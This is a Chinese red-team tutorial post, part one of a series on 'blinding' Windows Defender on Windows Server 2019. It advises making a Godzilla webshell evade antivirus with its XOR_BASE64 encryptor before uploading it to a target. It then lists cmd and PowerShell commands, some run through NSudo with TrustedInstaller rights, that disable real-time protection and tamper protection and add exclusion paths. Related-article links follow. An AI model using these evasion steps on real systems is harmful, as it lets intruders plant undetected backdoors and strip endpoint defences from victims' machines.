红蓝对抗之致盲 Windows defender(一)

简介: 红蓝对抗之致盲 Windows defender

Windows defender 介绍

Microsoft Defender 防病毒软件在 Windows 10 和 Windows 11 以及 Windows Server 版本中可用。

Microsoft Defender 防病毒软件是 Microsoft Defender for Endpoint 中下一代保护的主要组件。这种保护将机器学习、大数据分析、深入的威胁防御研究和 Microsoft 云基础设施结合在一起,以保护您组织中的设备(或端点)。Microsoft Defender 防病毒软件内置于 Windows 中,它与 Microsoft Defender for Endpoint 配合使用,为你的设备和云提供保护。

Windows defender 环境

版本

Windows Server 系统环境

  • 用户:Administrator
  • 版本:Windows Server 2019

补丁

systeminfo 信息

事前准备

在实战环境中,首先需要上传webshell,所以在此必须免杀webshell

web环境:phpstudy 8.1.1.3 + apache 2.4.39 + php 7.3.4

哥斯拉 webshell 免杀

工具地址:https://github.com/BeichenDream/Godzilla

经过测试,用Godzilla自带的PHP_XOR_BASE64加密器即可免杀(php一句话直接杀)

生成 PHP_XOR_BASE64 webshell

静态免杀测试

连接webshell

动态免杀测试

关闭 Windows defender

TrustedInstaller

TrustedInstaller是从Windows Vista开始出现的一个内置安全主体,在Windows中拥有修改系统文件权限,本身是一个服务,以一个账户组的形式出现。

它的全名是:NT SERVICE\TrustedInstaller

那么为什么要获取TrustedInstaller权限?

说白了就是因为Administratior权限system权限cmd无法关闭Windows defender(powershell可以)

注意:以下工具技巧皆需要Administratior权限或者system权限才能成功使用

基础命令介绍

cmd

#查看排除项
reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s
#查看版本
dir "C:\ProgramData\Microsoft\Windows Defender\Platform\" /od /ad /b
#查看篡改保护(返回结果中的 数值5代表开启,数值4代表关闭)
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection"
#需要TrustedInstaller权限
##cmd注册表关闭Windows defender
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f
##cmd关闭篡改保护
NSudoLG.exe -U:T cmd /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /d 4 /t REG_DWORD /f"
##cmd注册表恢复Windows defender
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 0 /f
##cmd添加Windows defender排除项
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" 

powershell

#查看排除项
Get-MpPreference | select ExclusionPath
#关闭Windows defender
Set-MpPreference -DisableRealTimeMonitoring $true
#增加排除项
Add-MpPreference -ExclusionPath "c:\temp"
#删除排除项
Remove-MpPreference -ExclusionPath "C:\test"
#关闭实时保护
Set-MpPreference -DisableRealtimeMonitoring $true


相关文章
|
7月前
|
安全 Windows
windows11 永久关闭windows defender的方法
windows11 永久关闭windows defender的方法
896 2
|
4月前
|
安全 Windows
【Azure云服务 Cloud Service】Cloud Service的实例(VM)中的服务描述Software Protection 与 Windows Defender, 如何设置Windows Defender Antivirus服务
【Azure云服务 Cloud Service】Cloud Service的实例(VM)中的服务描述Software Protection 与 Windows Defender, 如何设置Windows Defender Antivirus服务
|
4月前
|
安全 Windows
Windows关闭Microsoft Defender服务
【8月更文挑战第19天】以下是关闭Windows系统中Microsoft Defender的几种方法:通过设置界面可临时关闭实时保护等功能;使用组策略编辑器(专业版适用)可较彻底关闭;修改注册表需谨慎;或利用第三方工具如Defender Control便捷操作。关闭后系统将失去实时防护,请确保有其他可靠安全软件保护。
161 0
|
6月前
|
网络安全 Windows
windows Windows Defender彻底删除屏蔽后台启动占用内存 win10防火墙 windows10防火墙
windows Windows Defender彻底删除屏蔽后台启动占用内存 win10防火墙 windows10防火墙
78 0
|
缓存 安全 区块链
艰难的mimikatz源码编译免杀 Windows Defender(下)
艰难的mimikatz源码编译免杀 Windows Defender
486 0
|
安全 数据安全/隐私保护 C++
老树开新花之shellcode_launcher免杀Windows Defender(上)
老树开新花之shellcode_launcher免杀Windows Defender
667 0
|
安全 测试技术 Go
新版掩日——免杀Windows Defender
新版掩日——免杀Windows Defender
752 0
如何卸载,禁用和删除Windows Defender
如何卸载,禁用和删除Windows Defender
|
安全 Windows
红蓝对抗之致盲 Windows defender(二)
红蓝对抗之致盲 Windows defender
413 0